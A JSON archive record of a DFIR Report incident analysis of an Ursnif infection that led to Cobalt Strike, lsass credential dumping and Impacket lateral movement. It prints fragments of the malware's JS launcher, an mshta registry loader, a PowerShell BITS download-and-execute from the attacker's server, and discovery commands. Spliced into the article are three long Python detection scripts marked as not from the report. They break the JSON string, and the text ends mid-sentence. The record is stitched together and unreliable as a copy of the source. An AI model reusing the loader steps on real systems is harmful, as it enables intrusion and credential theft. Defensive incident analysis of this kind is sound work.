{
	"id": "80f461c7-0fc3-4a1e-8b20-b407dfca8741",
	"created_at": "2026-04-06T00:17:57.290802Z",
	"updated_at": "2026-04-10T03:24:23.556499Z",
	"deleted_at": null,
	"sha1_hash": "c17e16bba1b71d5a3aa5cb6fc11535cf624ab052",
	"title": "Unwrapping Ursnifs Gifts - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1911299,
	"plain_text": "Unwrapping Ursnifs Gifts - The DFIR Report\r\nBy editor\r\nPublished: 2023-01-09 · Archived: 2026-04-05 13:06:04 UTC\r\nIn late August 2022, we investigated an incident involving Ursnif malware, which resulted in Cobalt Strike being\r\ndeployed. This was followed by the threat actors moving laterally throughout the environment using an admin\r\naccount.\r\nThe Ursnif malware family (also commonly referred to as Gozi or ISFB) is one of the oldest banking trojans still\r\nactive today. It has an extensive past of code forks and evolutions that has led to several active variants in the last\r\n5 years including Dreambot, IAP, RM2, RM3 and most recently, LDR4.\r\nFor this report, we have referred to the malware as Ursnif for simplicity; however, we also recommend reading\r\nMandiant’s article on LDR4.\r\nCase Summary\r\nIn this intrusion, a malicious ISO file was delivered to a user which contained Ursnif malware. The malware\r\ndisplayed an interesting execution flow, which included using a renamed copy of rundll32. 
Once executed, the\r\nmalware conducted automatic discovery on the beachhead host, as we have observed with other loaders such as\r\nIcedID. The malware also established persistence on the host with the creation of a registry Run key.\r\nApproximately 4 days after the initial infection, new activity on the host provided a clear distinction of a threat\r\nactor performing manual actions (hands on keyboard). The threat actor used a Background Intelligent Transfer\r\nService (BITS) job to download a Cobalt Strike beacon, and then used the beacon for subsequent actions.\r\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\r\nPage 1 of 32\n\nThe threat actor first ran some initial discovery on the host using built-in Windows utilities like ipconfig,\r\nsysteminfo, net, and ping. Shortly afterwards, the threat actor injected into various processes and then proceeded\r\nto access lsass memory on the host to extract credentials.\r\nUsing the credentials extracted from memory, the threat actors began to move laterally. They targeted a domain\r\ncontroller and used Impacket’s wmiexec.py to execute code on the remote host. This included executing both an\r\nMSI installer for the RMM tools Atera and Splashtop, as well as a Cobalt Strike executable beacon. These files\r\nwere transferred to the domain controller over SMB.\r\nAfter connecting to the Cobalt Strike beacon on the domain controller, the threat actor executed another round of\r\ndiscovery tasks and dumped lsass memory on the domain controller. Finally, they dropped a script named\r\nadcomp.bat which executed a PowerShell command to collect data on computers in the Windows domain.\r\nThe following day, there was a short check-in on the beachhead host from a Cobalt Strike beacon; no other\r\nactivity occurred until near the end of the day. At that time, the threat actor became active by initiating a proxied\r\nRDP connection via the Cobalt Strike beacon to the domain controller. 
From there, the threat actor began\r\nconnecting to various hosts across the network.\r\nOne host of interest was a backup server: the threat actor logged in, checked the state of backups and reviewed\r\nrunning processes before exiting the session. The threat actor was later evicted from the network.\r\nTimeline\r\nAnalysis and reporting completed by @_pete_0, @svch0st and UC1.\r\nInitial Access\r\nIn this case, the Ursnif malware was delivered using a very familiar technique of being contained within an ISO\r\nfile.\r\nThe DFIR Report has previously reported on several incidents that involved the tactic of delivering malicious files\r\nusing ISO files:\r\nQuantum Ransomware\r\nBumbleBee Roasts Its Way to Domain Admin\r\nBumbleBee: Round Two\r\nDiavol Ransomware\r\nAs we have previously highlighted, the Event Log Microsoft-Windows-VHDMP-Operational.evtx contains high\r\nconfidence evidence when users mount ISO files. 
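One way to put that log to work at scale, as an added example that is not code from The DFIR Report: the script below takes the XML that wevtutil qe Microsoft-Windows-VHDMP-Operational /f:xml emits, keeps the event IDs the report recommends reviewing (1, 12 and 25), and reports every disk image mounted from a user-writable folder such as Downloads. The EventData field name carrying the image path is an assumption, so the parser scans every Data value for a disk-image path instead of trusting one name; the sample records, the user name and the folder list are constructed for the example.

```python
# Added example, not code from The DFIR Report: triage exported
# Microsoft-Windows-VHDMP-Operational records for disk-image mounts that
# originate from user-writable folders. Input is the XML that
#   wevtutil qe Microsoft-Windows-VHDMP-Operational /f:xml
# emits (one <Event> per record). The EventData field name that carries
# the image path is an assumption here, so the parser scans every <Data>
# value for something that looks like a disk image instead of trusting
# one field name.
import re
import xml.etree.ElementTree as ET

NS = {'e': 'http://schemas.microsoft.com/win/2004/08/events/event'}
MOUNT_EVENT_IDS = {1, 12, 25}          # the IDs the report recommends reviewing
DISK_IMAGE_RE = re.compile('.+[.](iso|img|vhd|vhdx)$', re.IGNORECASE)
BS = chr(92)                           # a single backslash
# Folders where a mounted image most likely arrived by mail or browser (assumption: tune per estate)
USER_WRITABLE = tuple(BS + d + BS for d in ('Downloads', 'Desktop', 'Temp', 'AppData', 'Outlook'))


def parse_events(xml_text):
    '''Yield (event_id, time, image_path, user_sid) for each record naming a disk image.'''
    root = ET.fromstring('<Events>' + xml_text + '</Events>')
    for ev in root.findall('e:Event', NS):
        system = ev.find('e:System', NS)
        event_id = int(system.find('e:EventID', NS).text)
        when = system.find('e:TimeCreated', NS).get('SystemTime')
        security = system.find('e:Security', NS)
        sid = security.get('UserID') if security is not None else None
        for data in ev.findall('e:EventData/e:Data', NS):
            value = (data.text or '').strip()
            if DISK_IMAGE_RE.match(value):
                yield event_id, when, value, sid
                break


def suspicious_mounts(xml_text):
    '''Mount records (IDs 1/12/25) whose image sits in a user-writable folder.'''
    hits = []
    for event_id, when, path, sid in parse_events(xml_text):
        if event_id not in MOUNT_EVENT_IDS:
            continue
        if any(folder.lower() in path.lower() for folder in USER_WRITABLE):
            hits.append({'event_id': event_id, 'time': when, 'image': path, 'sid': sid})
    return hits


# Constructed sample records (not from the case); the ISO path mirrors the
# Downloads-folder delivery described in this report.
USER_ISO = BS.join(['C:', 'Users', 'jdoe', 'Downloads', '3488164.iso'])
ADMIN_VHDX = BS.join(['D:', 'Images', 'srv01.vhdx'])
SAMPLE_XML = '''
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><Provider Name='Microsoft-Windows-VHDMP'/><EventID>1</EventID>
    <TimeCreated SystemTime='2022-08-30T09:14:02.000000Z'/>
    <Security UserID='S-1-5-21-1-2-3-1105'/></System>
  <EventData><Data Name='VhdFileName'>{iso}</Data></EventData>
</Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><Provider Name='Microsoft-Windows-VHDMP'/><EventID>12</EventID>
    <TimeCreated SystemTime='2022-08-30T11:00:00.000000Z'/>
    <Security UserID='S-1-5-18'/></System>
  <EventData><Data Name='VhdFileName'>{vhdx}</Data></EventData>
</Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><Provider Name='Microsoft-Windows-VHDMP'/><EventID>25</EventID>
    <TimeCreated SystemTime='2022-08-30T09:14:03.000000Z'/>
    <Security UserID='S-1-5-21-1-2-3-1105'/></System>
  <EventData><Data Name='VhdFileName'>{iso}</Data></EventData>
</Event>
'''.format(iso=USER_ISO, vhdx=ADMIN_VHDX)

if __name__ == '__main__':
    for hit in suspicious_mounts(SAMPLE_XML):
        print(hit)
```

The admin-mounted VHDX on a data drive drops out while both records for the Downloads-folder ISO are returned with the user SID, which is the pivot into the Security log and the user's download history.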
We recommend looking for these events (especially Event IDs\r\n1, 12 \u0026 25) in your environment and checking for anomalies.\r\nIn this case, the user had saved the file 3488164.iso to their Downloads folder and mounted it.\r\nOnce mounted, the new drive contained a LNK file 6570872.lnk and a hidden folder “me”.\r\nIf we parse this LNK file with LECmd (by Eric Zimmerman), it highlights the execution path and the icon it\r\nappears as:\r\nThe contents of the hidden folder “me” included several files and folders that were used for the execution of Ursnif.\r\nOf interest, the folder included a legitimate copy of rundll32.exe (renamed to 123.com).\r\nSummary of the files found in 3488164.iso (a detailed breakdown of these can be found in Execution):\r\nFile Name - Purpose\r\n6570872.lnk - LNK file that executes alsoOne.bat\r\nme/by - Empty folder\r\nme/here - Empty folder\r\nme/123.com - Renamed legitimate copy of rundll32.exe\r\nme/alsoOne.bat - Batch script that runs canWell.js with specific arguments\r\nme/canWell.js - Reverses its argument strings and executes itsIt.db with 123.com\r\nme/itsIt.db - Ursnif DLL\r\nor.jpg - Image, not used\r\nExecution\r\nOnce the user had mounted the ISO and executed the LNK file, the complex execution flow\r\nstarted.\r\nUrsnif Malware\r\nHighlighted in Initial Access, the LNK file would execute the batch script alsoOne.bat. 
This script called a\r\nJavaScript file canWell.js in the same directory and provided a number of reversed strings as arguments (cexe\r\nreverses to exec, lldnur to rundll and revreSretsigeRllD to DllRegisterServer):\r\nalsoOne.bat\r\nset %params%=hello\r\nme\\canWell.js hello cexe lldnur revreSretsigeRllD\r\ncanWell.js\r\n/**\r\nWhnldGh\r\n*/\r\nfunction reverseString(str)\r\n{\r\nvar splitString = str.split(\"\");\r\nvar reverseArray = splitString.reverse();\r\nvar joinArray = reverseArray.join(\"\");\r\nreturn joinArray;\r\n}\r\nfunction ar(id)\r\n{\r\nr = WScript.Arguments(id);\r\nreturn r;\r\n}\r\nvar sh = WScript.CreateObject(\"WScript.Shell\");\r\nsh[reverseString(ar(1))](\"me\\\\123.com me/itsIt.db,\"+reverseString(a\r\nThe JS file was then executed with wscript.exe and used the provided command line arguments to build and run\r\nthe following command through WScript.Shell.Exec():\r\nme/123.com me/itsIt.db,DllRegisterServer\r\nUsing the SRUM database, we were able to determine that the renamed rundll32.exe binary (123.com) downloaded\r\napproximately 0.4 MB of data.\r\nOnce the malware was executed, the parent instance of explorer launched MSHTA with the following command:\r\n\"C:\\Windows\\System32\\mshta.exe\" \"about:\u003chta:application\u003e\u003cscript\u003eCxak='wscript.shell';resizeTo(0,2);ev\r\nThis one-liner created a new ActiveX object to eval() the content stored in a registry value in the user’s registry\r\nhive. The content of the value “ActiveDevice”:\r\nThe payload used another ActiveX object to run a PowerShell command. This command created additional aliases\r\nfor the default PowerShell aliases gp (Get-ItemProperty) and iex (Invoke-Expression). 
These two new\r\naliases were used to get and execute the content in another registry value “MemoryJunk”:\r\nAhgvof=new ActiveXObject('WScript.Shell');Ahgvof.Run('powershell new-alias -name qirlbtfhgo -value gp\r\nAnalyst Note: The names of the registry values changed when we ran the payload in a sandbox during analysis,\r\nso we suspect they are generated at random at execution.\r\nThe last registry value was used to store additional PowerShell code. This script called a combination of\r\nQueueUserAPC, GetCurrentThreadId, OpenThread, and VirtualAlloc to perform process injection of shellcode\r\nstored in Base64.\r\nWhen the Add-Type cmdlet is executed, PowerShell invokes the C# compiler csc.exe to compile the class\r\ndefinition, which results in the creation of temporary files in %LOCALAPPDATA%\\Temp:\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @\"C:\\Users\\\u003cREDACTED\u003e\\Ap\r\nFinally, a cmd.exe instance spawned from the parent explorer.exe process ran the built-in pause command with\r\nmultiple arguments, which appeared to not provide any additional functionality:\r\n\"C:\\Windows\\syswow64\\cmd.exe\" /C pause dll mail, ,\r\nA Sigma rule for this command line can be found in the Detections section of this report.\r\nAt this point, less than a minute had elapsed since the user first opened the malware.\r\nOnce the malware was established on the host, there was limited malicious activity until around 3 days later. 
That\r\nis when we began to observe evidence indicative of “hands-on-keyboard” activity.\r\nCobalt Strike\r\nAn instance of cmd.exe was launched through explorer.exe which ran the following command:\r\npowershell.exe -nop -c \"start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\\' + [Sy\r\nAnalyst Note: Ursnif has been known to have VNC-like capabilities. It is possible this explorer.exe ➝ cmd.exe\r\nsession was through a VNC session.\r\nThis PowerShell command started a BITS job to download a Cobalt Strike beacon from 193.201.9[.]199 and\r\nsaved it with a random name to %TEMP%. It then read the file into a variable, deleted it, and executed the\r\ncontent with IEX.\r\nThe event log Microsoft-Windows-Bits-Client%4Operational.evtx corroborated this activity:\r\nThe activity following this event demonstrated a clear distinction of the threat actor performing discovery\r\nmanually.\r\nPersistence\r\nOnce the foothold had been achieved, after execution of Ursnif on the beachhead host, persistence was achieved\r\nby creating a ‘Run’ key named ManagerText which was configured to execute a LNK file which executed a\r\nPowerShell script.\r\nCredential Access\r\nWe observed a process created by Cobalt Strike accessing lsass.exe. The GrantedAccess code of 0x1010 is a\r\nknown indicator of such tools as Mimikatz (0x1010 decodes to PROCESS_VM_READ combined with\r\nPROCESS_QUERY_LIMITED_INFORMATION, which is enough to read LSASS memory). 
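Decoding that access mask and triaging such events automatically, as an added example that is not code from The DFIR Report: the script parses Sysmon Event ID 10 records in the key: value layout the report reproduces for this case, names the process rights in GrantedAccess, and flags lsass.exe handles that carry dump-capable rights, that come from a signed LOLBin such as rundll32.exe, or whose CallTrace passes through unbacked memory (the UNKNOWN frames typical of injected beacon code). The sample records, the allow-list of images and the LOLBin list are constructed assumptions to tune per estate; an allow-list keyed on image name alone is weak, so verify path and signer in production.

```python
# Added example, not code from The DFIR Report: triage Sysmon Event ID 10
# (ProcessAccess) records written in the key: value layout the report
# reproduces, decode GrantedAccess into named process rights, and flag
# lsass.exe handles that a credential dumper needs. The sample records
# are constructed; the allow-list and LOLBin list are assumptions to tune.
import re

PROCESS_RIGHTS = {
    0x0001: 'PROCESS_TERMINATE', 0x0002: 'PROCESS_CREATE_THREAD',
    0x0008: 'PROCESS_VM_OPERATION', 0x0010: 'PROCESS_VM_READ',
    0x0020: 'PROCESS_VM_WRITE', 0x0040: 'PROCESS_DUP_HANDLE',
    0x0080: 'PROCESS_CREATE_PROCESS', 0x0200: 'PROCESS_SET_INFORMATION',
    0x0400: 'PROCESS_QUERY_INFORMATION', 0x0800: 'PROCESS_SUSPEND_RESUME',
    0x1000: 'PROCESS_QUERY_LIMITED_INFORMATION',
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# Any of these on lsass lets a tool read or tamper with credential material.
DUMP_RIGHTS = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040
# Images that read lsass routinely on most estates (assumption; verify by path and signer, not name alone).
ALLOWED_SOURCES = {'msmpeng.exe', 'csrss.exe', 'wmiprvse.exe', 'taskmgr.exe'}
# Signed Windows binaries a beacon commonly runs its post-exploitation jobs in (spawnto).
LOLBINS = {'rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'powershell.exe', 'dllhost.exe'}
FIELD_RE = re.compile('^([A-Za-z]+): (.*)$')
BS = chr(92)                                   # a single backslash


def parse_event(text):
    '''Turn the key: value lines of a Sysmon message into a dict.'''
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def decode_access(mask):
    '''Names of the process rights set in a GrantedAccess mask, lowest bit first.'''
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def image_name(path):
    return path.lower().rsplit(BS, 1)[-1]


def triage(text):
    '''None for benign lsass access, else a dict describing why it is suspicious.'''
    f = parse_event(text)
    if image_name(f.get('TargetImage', '')) != 'lsass.exe':
        return None
    source = image_name(f.get('SourceImage', ''))
    if source in ALLOWED_SOURCES:
        return None
    mask = int(f.get('GrantedAccess', '0x0'), 16)
    reasons = []
    if mask == PROCESS_ALL_ACCESS or mask & DUMP_RIGHTS:
        reasons.append('dump-capable rights: ' + ','.join(decode_access(mask)))
    if 'UNKNOWN(' in f.get('CallTrace', ''):
        reasons.append('call stack passes through unbacked memory (injected code)')
    if source in LOLBINS:
        reasons.append(source + ' is a LOLBin that should not open lsass')
    if not reasons:
        return None
    return {'source': source, 'granted': hex(mask), 'reasons': reasons}


def win(*parts):
    return BS.join(parts)


# Constructed records in the layout of the Sysmon event in this report (not the case data itself).
SAMPLE_SUSPICIOUS = '''
Process accessed:
RuleName: technique_id=T1003,technique_name=Credential Dumping
SourceImage: {src}
TargetImage: {dst}
GrantedAccess: 0x1010
CallTrace: {trace}
'''.format(src=win('C:', 'Windows', 'system32', 'rundll32.exe'),
           dst=win('C:', 'Windows', 'system32', 'lsass.exe'),
           trace='|'.join([win('C:', 'Windows', 'SYSTEM32', 'ntdll.dll') + '+9fc24',
                           win('C:', 'Windows', 'System32', 'KERNELBASE.dll') + '+20d0e',
                           'UNKNOWN(000001A2B3C40000)']))

SAMPLE_BENIGN = '''
Process accessed:
SourceImage: {src}
TargetImage: {dst}
GrantedAccess: 0x1000
CallTrace: {trace}
'''.format(src=win('C:', 'ProgramData', 'Microsoft', 'Windows Defender', 'Platform', 'MsMpEng.exe'),
           dst=win('C:', 'Windows', 'system32', 'lsass.exe'),
           trace=win('C:', 'Windows', 'SYSTEM32', 'ntdll.dll') + '+9fc24')

if __name__ == '__main__':
    print(triage(SAMPLE_SUSPICIOUS))
    print(triage(SAMPLE_BENIGN))
```

The suspicious sample is reported for three independent reasons, which is the point: GrantedAccess alone is noisy (0x1010 is also requested by some monitoring agents), but a LOLBin reading lsass through an unbacked call stack is not something a benign agent does.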
This was observed on both the beachhead host and a domain\r\ncontroller.\r\nLogName=Microsoft-Windows-Sysmon/Operational\r\nEventCode=10\r\nEventType=4\r\nComputerName=\u003cREDACTED\u003e\r\nUser=SYSTEM\r\nSid=S-1-5-18\r\nSidType=1\r\nSourceName=Microsoft-Windows-Sysmon\r\nType=Information\r\nRecordNumber=765707\r\nKeywords=None\r\nTaskCategory=Process accessed (rule: ProcessAccess)\r\nOpCode=Info\r\nMessage=Process accessed:\r\nRuleName: technique_id=T1003,technique_name=Credential Dumping\r\nUtcTime: \u003cREDACTED\u003e\r\nSourceProcess GUID: {aaadb608-97b2-630c-6750-000000000400}\r\nSourceProcessId: 4768\r\nSourceThreadId: 4248\r\nSourceImage: C:\\Windows\\system32\\rundll32.exe\r\nTargetProcessGUID: {aaadb608-45a2-62fc-0c00-000000000400}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1010\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+20d0e|UNKNOWN(00000\r\nDiscovery\r\nUrsnif related discovery\r\nAs we have observed in other malware, Ursnif ran a number of automated discovery commands to gain\r\ninformation about the environment. 
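Detecting such a burst in process-creation telemetry, as an added example that is not code from The DFIR Report: because the loader runs many built-in tools from one parent within seconds and funnels every result into the same temp file, the script keys on the pair (parent PID, redirect target) rather than on any single command line, counts the distinct discovery tools written to that file inside a short window, and ignores a lone administrator running one command. The events are constructed and modelled on the Ursnif command sequence in this report; the tool list, the threshold of four distinct tools and the 120-second window are assumptions to tune.

```python
# Added example, not code from The DFIR Report: surface a loader's
# automated discovery burst in process-creation telemetry. Ursnif (like
# IcedID) ran a dozen built-in tools from one parent within seconds and
# redirected every result into the same temp file, so the pair
# (parent PID, redirect target) is a more robust key than any single
# command line. Sample events and thresholds are constructed/assumed.
import re
from collections import defaultdict
from datetime import datetime

DISCOVERY_TOOLS = {'wmic', 'systeminfo', 'net', 'net1', 'nslookup', 'tasklist',
                   'driverquery', 'reg', 'nltest', 'whoami', 'ipconfig'}
MIN_DISTINCT_TOOLS = 4        # assumption: tune to your estate
WINDOW_SECONDS = 120          # assumption
Q = chr(34)                   # double quote
BS = chr(92)                  # backslash
# the command text inside a cmd /C wrapper (the opening quote is optional)
INNER_RE = re.compile('cmd(?:[.]exe)?[ ]+/[cC][ ]+' + Q + '?(.*)$', re.IGNORECASE)
# first > or >> redirect target, stopping at a space or a closing quote
REDIRECT_RE = re.compile('>>?[ ]*([^ ' + Q + ']+)')


def parse_cmdline(cmdline):
    '''(tool, redirect_target) for a cmd /C wrapper, else (None, None).'''
    m = INNER_RE.search(cmdline)
    if not m:
        return None, None
    inner = m.group(1).strip().rstrip(Q)
    if not inner:
        return None, None
    tool = inner.split()[0].lower().rsplit(BS, 1)[-1]
    if tool.endswith('.exe'):
        tool = tool[:-4]
    r = REDIRECT_RE.search(inner)
    return tool, (r.group(1).lower() if r else None)


def find_discovery_bursts(events):
    '''events: dicts with time (ISO 8601), parent_pid and cmdline keys.'''
    groups = defaultdict(list)
    for ev in events:
        tool, target = parse_cmdline(ev['cmdline'])
        if tool in DISCOVERY_TOOLS and target:
            groups[(ev['parent_pid'], target)].append((datetime.fromisoformat(ev['time']), tool))
    alerts = []
    for (ppid, target), seen in groups.items():
        seen.sort()
        tools = {t for _, t in seen}
        span = (seen[-1][0] - seen[0][0]).total_seconds()
        if len(tools) >= MIN_DISTINCT_TOOLS and span <= WINDOW_SECONDS:
            alerts.append({'parent_pid': ppid, 'output_file': target,
                           'tools': sorted(tools), 'span_seconds': span})
    return alerts


def wrap(inner):
    return 'cmd /C ' + Q + inner + Q


# Constructed events modelled on the Ursnif sequence in this report (not the case records).
OUT = BS.join(['C:', 'Users', 'jdoe', 'AppData', 'Local', 'Temp', 'BD2C.bin1'])
ADMIN_OUT = BS.join(['C:', 'Users', 'admin', 'Desktop', 'shares.txt'])
SAMPLE_EVENTS = [
    {'time': '2022-08-30T09:15:01', 'parent_pid': 4312, 'cmdline': wrap('wmic computersystem get domain |more > ' + OUT)},
    {'time': '2022-08-30T09:15:01', 'parent_pid': 4312, 'cmdline': wrap('echo -------- >> ' + OUT)},
    {'time': '2022-08-30T09:15:02', 'parent_pid': 4312, 'cmdline': wrap('systeminfo.exe > ' + OUT)},
    {'time': '2022-08-30T09:15:03', 'parent_pid': 4312, 'cmdline': wrap('net view >> ' + OUT)},
    {'time': '2022-08-30T09:15:04', 'parent_pid': 4312, 'cmdline': wrap('nslookup 127.0.0.1 >> ' + OUT)},
    {'time': '2022-08-30T09:15:05', 'parent_pid': 4312, 'cmdline': wrap('tasklist.exe /SVC >> ' + OUT)},
    {'time': '2022-08-30T09:15:06', 'parent_pid': 4312, 'cmdline': wrap('driverquery.exe >> ' + OUT)},
    {'time': '2022-08-30T09:15:08', 'parent_pid': 4312, 'cmdline': wrap('nltest /domain_trusts >> ' + OUT)},
    # a lone admin share listing: one tool, no burst
    {'time': '2022-08-30T10:40:12', 'parent_pid': 2200, 'cmdline': wrap('net view >> ' + ADMIN_OUT)},
]

if __name__ == '__main__':
    for alert in find_discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

The echo separators are parsed but never counted, and the lone net view from a different parent never reaches the threshold, so the single alert names the parent to pivot on and the temp file to collect before the malware deletes it.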
The following commands were executed and their standard output was\r\nredirected into a file in the user’s %LOCALAPPDATA%\\Temp\\ folder (the wmic and systeminfo commands used \u003e,\r\nwhich creates or truncates the file; the rest appended with \u003e\u003e):\r\ncmd /C \"wmic computersystem get domain |more \u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"systeminfo.exe \u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net view \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"nslookup 127.0.0.1 \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"tasklist.exe /SVC \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"driverquery.exe \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s \u003e\u003e C:\\Users\\\u003cREDA\r\ncmd /C \"nltest /domain_trusts \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net config workstation \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e 
C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"nltest /domain_trusts \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"nltest /domain_trusts /all_trusts \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net view /all /domain \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"net view /all \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\ncmd /C \"echo -------- \u003e\u003e C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\BD2C.bin1\"\r\nManual discovery\r\nOnce the threat actor had Cobalt Strike running on the beachhead host, they ran the following commands:\r\nwhoami\r\nwhoami /groups\r\ntime\r\nipconfig /all\r\nsysteminfo\r\nThe threat actor quickly took interest in a support account. 
This account belonged to the Domain Admin group.\r\nnet user \u003cREDACTED\u003e\r\nThe threat actor also used a batch script to collect a list of all computer objects on the domain using\r\nC:\\Windows\\system32\\cmd.exe /C adcomp.bat which contained the PowerShell command:\r\npowershell Get-ADComputer -Filter * -Properties Name,Operatingsystem, OperatingSystemVersion, Operati\r\nDuring the final actions taken by the threat actors before eviction, after completing RDP connections to various\r\nhosts on the network, the threat actors checked running processes on the accessed hosts via Task Manager, which\r\nwas started from their interactive RDP session, as indicated by the /4 command line argument:\r\nC:\\Windows\\system32\\taskmgr.exe /4\r\nLateral Movement\r\nWMI was used to pivot to a domain controller on the network. The actor leveraged Impacket’s wmiexec.py to\r\nexecute commands with a semi-interactive shell, most likely using credentials gathered by the previous LSASS\r\naccess.\r\nThe commands executed included directory traversal, host discovery, and execution of tools on the DC.\r\nA breakdown of the parent and child processes invoked:\r\nThe command can be broken down as follows:\r\n‘/Q’ turns off command echo, so nothing is printed back.\r\n‘/C’ stops after the command has executed.\r\n127.0.0.1 and ADMIN$ refer to C:\\Windows on the target host itself, which is where the output file is written.\r\nOutput is captured via the parameter ‘2\u003e\u00261’, which redirects errors and output into the same file:\r\nThis command line closely resembles the code within wmiexec.py, part of the Impacket tool maintained by\r\nFortra.\r\nAs Impacket interacts with remote endpoints via WMI over TCP via DCERPC, it is possible to inspect network\r\nlevel packets:\r\nThe use of Impacket by threat actors has been recently detailed by CISA in alert AA22-277A – Impacket and\r\nExfiltration Tool 
Used to Steal Sensitive Information from Defense Industrial Base Organization.\r\nThe Impacket process hierarchy in this case can be visualized as:\r\nAt the network level, commands are issued over DCOM/RPC (port 135 and a dynamic high port), with the output\r\nretrieved over SMB on port 445. We can observe a number of WMI requests via DCERPC from one endpoint to a\r\ntarget endpoint based on the ports.\r\nCorrelating the network activity to the host activity confirms that the ‘Powershell.exe’ process initiated the WMI\r\nrequests.\r\nThe destination port is within the dynamic/ephemeral port range 49152–65535 defined in RFC 6335, which is used for\r\nshort-lived connections.\r\n13Cubed (Richard Davis) also released an excellent resource for investigating Impacket related incidents here:\r\nhttps://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet_poster.pdf\r\nOne of the observed commands invoked via WMI was ‘firefox.exe’.\r\nThis was dropped on the DC, spawned a number of processes and invoked a number of hands-on commands.\r\nThe process generated a significant volume of network connections to 193.201.9[.]199, averaging ~6K requests\r\nper hour, equating to \u003e150K connections throughout the duration of the intrusion.\r\nRDP was also used by the threat actor on the final two days of the intrusion to connect to various hosts from a\r\ndomain controller, proxying the traffic via the firefox.exe Cobalt Strike beacon.\r\nCommand and Control\r\nUrsnif\r\nUrsnif was seen using the following domains and 
